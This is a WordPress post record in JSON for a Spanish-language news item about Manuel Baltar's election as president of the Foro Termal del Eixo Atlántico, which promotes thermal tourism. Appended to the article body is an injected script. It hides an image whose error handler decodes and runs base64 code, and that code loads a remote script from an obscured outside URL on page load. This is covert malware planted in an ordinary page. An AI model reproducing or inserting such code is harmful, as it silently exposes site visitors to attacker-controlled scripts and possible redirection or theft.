{"id":4292,"date":"2021-02-26T12:55:50","date_gmt":"2021-02-26T15:55:50","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=4292"},"modified":"2025-08-13T16:33:55","modified_gmt":"2025-08-13T19:33:55","slug":"manuel-baltar-presidente-del-foro-termal-del-eixo-atlantico","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=4292","title":{"rendered":"Manuel Baltar, presidente del Foro Termal del Eixo Atl\u00e1ntico"},"content":{"rendered":"\n<div class=\"wp-block-image\"><figure class=\"alignright size-large is-resized\"><a href=\"https:\/\/www.laregion.es\/articulo\/ourense\/manuel-baltar-presidente-foro-termal-eixo-atlantico\/202102251417551009013.html?utm_medium=social&amp;utm_source=whatsapp&amp;utm_campaign=share_button&amp;fbclid=IwAR0isYbjqgdIESwoWCrRVD-ahvAUGFfwpcEMWpxxVhOpKuu1449d9xxmC9c\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/02\/canvas-110.png\" alt=\"\" class=\"wp-image-4294\" width=\"202\" height=\"37\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/02\/canvas-110.png 545w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/02\/canvas-110-300x55.png 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/02\/canvas-110-533x100.png 533w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/02\/canvas-110-534x100.png 534w\" sizes=\"(max-width: 202px) 100vw, 202px\" \/><\/a><\/figure><\/div>\n\n\n\n<p><strong>El Foro Termal busca promocionar e impulsar el termalismo\u00a0en la Eurorregi\u00f3n Galicia-Norte de Portugal<\/strong><\/p>\n\n\n\n<p>El presidente de la Diputaci\u00f3n de Ourense, Manuel Baltar, ha sido elegido por unanimidad&nbsp;<strong>presidente del Foro Termal del Eixo Atl\u00e1ntico.<\/strong>&nbsp;El Foro Termal, creado bajo la red de coordinaci\u00f3n del Eixo Atl\u00e1ntico,&nbsp;tiene como objetivo promocionar e impulsar el termalismo en la Eurorregi\u00f3n Galicia-Norte de Portugal, tanto a nivel nacional e internacional, con una estrategia conjunta de las 14 entidades locales que la integran.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Manuel Baltar nombrado presidente del Foro Termal del Eixo Atl\u00e1ntico\" width=\"640\" height=\"360\" src=\"https:\/\/www.youtube.com\/embed\/j6Tfu25OLXM?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>La promoci\u00f3n y puesta en valor del termalismo y del patrimonio termal de la Eurorregi\u00f3n as\u00ed como&nbsp;iniciativas conjuntas para promocionar el sector son algunos de los proyectos del Foro Termal, que buscan estimular la econom\u00eda de los municipios termales y de la eurorregi\u00f3n.<\/p>\n\n\n\n<p>El nombramiento de Manuel Baltar como presidente del Foro Termal llega despu\u00e9s de que la Diputaci\u00f3n de Ourense se incorporara al Eixo Atl\u00e1ntico, lo que supone un \u00abexcelente posicionamento\u00bb para Ourense, as\u00ed como \u00abunha magn\u00edfica oportunidade para desenvolver proxectos europeos de cooperaci\u00f3n interritorial\u00bb, se\u00f1al\u00f3 Baltar, quien destac\u00f3 la cooperaci\u00f3n como estrategia fundamental del termalismo en Europa.about:blank<\/p>\n\n\n\n<p>El presidente de la Diputaci\u00f3n destac\u00f3 la necesidad de apostar por la innovaci\u00f3n&nbsp;como el caso del termalismo deportivo, que se desarrolla en los concellos ourensanos de Cenlle, Arnoia y Castrelo de Mi\u00f1o. Baltar tambi\u00e9n record\u00f3 que desde la Asociaci\u00f3n de Ciudades Hist\u00f3ricas Termales de Europa se est\u00e1 trabajando para crear el \u00abD\u00eda Mundial del Termalismo\u00bb para poner en valor y dar m\u00e1s visibilidad a las zonas termales.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Foro Termal busca promocionar e impulsar el termalismo\u00a0en la Eurorregi\u00f3n Galicia-Norte de Portugal El presidente de la Diputaci\u00f3n de Ourense, Manuel Baltar, ha sido elegido por unanimidad&nbsp;presidente del Foro Termal del Eixo Atl\u00e1ntico.&nbsp;El Foro Termal, creado bajo la red de coordinaci\u00f3n del Eixo Atl\u00e1ntico,&nbsp;tiene como objetivo promocionar e impulsar el termalismo en la Eurorregi\u00f3n [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":4295,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[31,28],"tags":[],"class_list":["post-4292","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-colaboradores","category-portales-de-servicios-e-informacion"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4292","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4292"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4292\/revisions"}],"predecessor-version":[{"id":10859,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4292\/revisions\/10859"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4295"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4292"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4292"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4292"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}